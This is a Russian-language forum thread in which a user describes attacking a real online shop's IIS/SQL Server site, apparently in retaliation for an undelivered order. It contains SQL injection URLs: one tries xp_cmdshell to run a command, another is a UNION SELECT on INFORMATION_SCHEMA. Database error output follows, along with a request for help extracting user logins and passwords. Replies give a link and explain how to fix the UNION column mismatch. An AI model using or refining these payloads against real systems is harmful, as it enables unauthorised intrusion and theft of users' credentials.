|
Взлом сервера Microsoft IIS 6 Через SQL Запросы
Недавно Друг Сообщил Что Он Заказал MP3 С Интернет Магазина, Прошло 3 Месяца а MP3 Так и Не Пришел.
Я решил взгянуть на сайт этого магазина переход по страницам там такой: /product.asp?f=1710 Я проверил следуйщий запрос (Проверить Тупость Админа): /product.asp?f=1710%20%20';%20exec%20master..xp_cmd shell%20'ping%2010.10.1.2'%20-- В Ответ получил следуйщие: ------------------------------------------------------------- Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC SQL Server Driver][SQL Server]EXECUTE permission denied on object 'xp_cmdshell', database 'master', owner 'dbo'. /includes/header.asp, line 17 ------------------------------------------------------------ У админа есть немного мозгов =)) Другим запросом узнал название базы, НО когда пытаюсь выполнить запрос с UNION выдаёт следуйшие: (Запрос был таков: /product.asp?f=1710 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--) ------------------------------------------------------------- Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. ------------------------------------------------------------ Подскажи как получить название таблиц,логины,и пароли юзеров. Заранее Спасибо за помошь. |
На вот десь почитай, Егорыч хорошую статью выложил, ну мож не много не по твоей теме, но суть подходит.
http://forum.antichat.ru/showthread.php?t=5171 |
Тут надо к Егору обращаться... Он в Iss намного больше меня разбирается.
|
Ну так с UNION вот какая проблема.
Дело в том что на корявом языке MS это называется как ты написал. У тебя SELECT перед UNION имеет не столько же колонок сколько SELECT после UNION. Пример правильно: SELECT 1,1,1,2 UNION SELECT 0,0,2,1 Неправильно: SELECT 1,1,1,2 UNION SELECT 0,1,2 |
| Время: 22:16 |